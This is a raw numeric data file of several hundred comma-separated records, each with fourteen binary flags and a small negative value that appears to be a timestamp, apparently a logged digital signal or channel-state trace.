1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1584800e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1582000e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1579600e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1577200e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1574800e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1572400e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1570000e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1567200e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1564800e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1562000e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1559600e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1557200e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1554800e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1552400e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1549200e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1546800e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1544400e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1542000e-04 1,0,0,1,0,0,0,0,0,0,0,0,1,0,-9.1539600e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,0,-9.1537200e-04 1,0,0,1,0,0,0,0,0,0,0,0,0,1,-7.9168400e-04 0,0,0,1,0,0,0,0,0,0,0,0,0,1,-7.9146800e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,1,-7.9144400e-04 0,1,0,1,0,0,0,0,0,0,0,1,0,1,-7.9142800e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,1,-7.9139600e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,1,-7.9112800e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,1,-7.9110000e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,1,-7.9107600e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,1,-7.9105200e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,1,-7.9102800e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,1,-7.9100400e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,1,-7.9098000e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,1,-7.9095200e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,1,-7.9092800e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,1,-7.9090000e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,1,-7.9089600e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,1,-7.9087600e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.9085200e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.9082800e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.9080400e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.9078000e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.9075200e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.9074800e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.9072800e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.9070000e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.9067600e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.9065200e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.9062800e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.9060400e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.9058000e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.9055200e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.9054800e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.9052800e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.9050000e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.9047600e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.9045200e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.9042800e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.9040400e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.9039600e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.9038000e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.9035200e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.9032800e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.9030000e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.9027600e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.9025200e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.9022800e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.9020400e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.9019600e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.9018000e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.9015200e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.9012800e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.9010000e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.9007600e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.9005200e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.9004800e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.9002800e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.9000400e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8998000e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8995200e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8992800e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8990000e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8987600e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8985200e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8984400e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8982800e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8980400e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8978000e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8975200e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8970000e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8967600e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8962800e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8960400e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8955200e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8952800e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8947600e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8945200e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8940400e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8938000e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8932400e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8930000e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8927600e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8925200e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8924800e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8922800e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8920400e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8918000e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8915200e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8912800e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8910000e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8907600e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8905200e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8902800e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8900400e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8899600e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8898000e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8895200e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8892800e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8890000e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8887600e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8885200e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8882800e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8880400e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8878000e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8875200e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8872800e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8870800e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8870000e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8868000e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8865600e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8864800e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8862800e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8860400e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8858000e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8855600e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8853200e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8850800e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8850000e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8848000e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8845600e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8842800e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8840400e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8838000e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8835600e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8833200e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8830800e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8830000e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8828000e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8825600e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8822800e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8820400e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8815600e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8813200e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8808000e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8805200e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8800400e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8798000e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8793200e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8790400e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8785200e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8782800e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8778000e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8775600e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8773200e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8770800e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8770000e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8768000e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8765200e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8764800e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8762800e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8760400e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8760000e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8758000e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8755600e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8753200e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8750400e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8748000e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8745200e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8744800e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8742800e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8740400e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8738000e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8735200e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8733200e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8730400e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8730000e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8728000e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8725200e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8722800e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8720400e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8718000e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8715200e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8712800e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8710800e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8707600e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8705200e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8704400e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8702800e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8700400e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8698000e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8695200e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8694800e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8692800e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8690000e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8687600e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8685200e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8682800e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8680400e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8678000e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8675200e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8672800e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8670000e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8669600e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8667600e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8665200e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8664800e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8662800e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8660400e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8659600e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8658000e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8655200e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8652800e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8650000e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8647600e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8645200e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8642800e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8640400e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8639600e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8638000e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8635200e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8634800e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8632800e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8630000e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8627600e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8625200e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8624400e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8622800e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8620400e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8618000e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8615200e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8612800e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8610000e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8607600e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8605200e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8604800e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8602800e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8600400e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8599600e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8598000e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8595200e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8592800e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8590000e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8587600e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8585200e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8582800e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8580400e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8578000e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8575200e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8572800e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8570000e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8569600e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8567600e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8565200e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8562800e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8560400e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8559600e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8558000e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8555200e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8554800e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8552800e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8550000e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8547600e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8545200e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8542800e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8540400e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8538000e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8535200e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8534800e-04 0,1,0,1,0,1,0,0,0,1,0,0,1,0,-7.8532800e-04 0,1,0,1,0,1,0,0,0,1,0,0,0,0,-7.8530000e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8529600e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8527600e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8525200e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8522800e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8520400e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8518000e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8515200e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8512800e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8510800e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8508000e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8505200e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8502800e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8500400e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8498000e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8495200e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8493200e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8490400e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8488000e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8485600e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8482800e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8480400e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8478000e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8475600e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8473200e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8470800e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8468000e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8465600e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8462800e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8460400e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8458000e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8455600e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8453200e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8450800e-04 0,1,0,1,0,0,0,0,0,0,0,0,1,0,-7.8448000e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,0,-7.8445600e-04 0,1,0,1,0,0,0,0,0,0,0,0,0,1,-6.5978000e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,1,-6.5958800e-04 1,1,0,1,0,0,0,0,0,0,0,1,0,1,-6.5956800e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,1,-6.5954400e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,1,-6.5925200e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,1,-6.5922800e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,1,-6.5920400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,1,-6.5918000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,1,-6.5915600e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,1,-6.5913200e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,1,-6.5910400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,1,-6.5908000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,1,-6.5905200e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,1,-6.5902800e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,1,-6.5900400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,1,-6.5898000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,1,-6.5895600e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5894800e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5893200e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5890400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5888000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5885200e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5882800e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5880400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5878000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5875600e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5873200e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5870400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5868000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5865200e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5862800e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5860400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5858000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5855600e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5853200e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5850400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5848000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5845200e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5842800e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5840400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5838000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5835600e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5833200e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5830400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5828000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5825200e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5822800e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5820400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5818000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5815600e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5813200e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5810400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5808000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5805200e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5802800e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5800400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5798000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5795600e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5793200e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5790400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5788000e-04 1,1,0,1,0,1,0,0,0,1,0,0,0,0,-6.5787600e-04 1,1,0,1,0,1,0,0,0,1,0,0,1,0,-6.5785200e-04 1,1,0,1,0,1,0,0,0,1,0,0,0,0,-6.5782800e-04 1,1,0,1,0,1,0,0,0,1,0,0,1,0,-6.5780400e-04 1,1,0,1,0,1,0,0,0,1,0,0,0,0,-6.5778000e-04 1,1,0,1,0,1,0,0,0,1,0,0,1,0,-6.5775600e-04 1,1,0,1,0,1,0,0,0,1,0,0,0,0,-6.5773200e-04 1,1,0,1,0,1,0,0,0,1,0,0,1,0,-6.5770400e-04 1,1,0,1,0,1,0,0,0,1,0,0,0,0,-6.5768000e-04 1,1,0,1,0,1,0,0,0,1,0,0,1,0,-6.5765200e-04 1,1,0,1,0,1,0,0,0,1,0,0,0,0,-6.5762800e-04 1,1,0,1,0,1,0,0,0,1,0,0,1,0,-6.5760400e-04 1,1,0,1,0,1,0,0,0,1,0,0,0,0,-6.5758000e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5757200e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5755600e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5753200e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5750400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5748000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5745200e-04 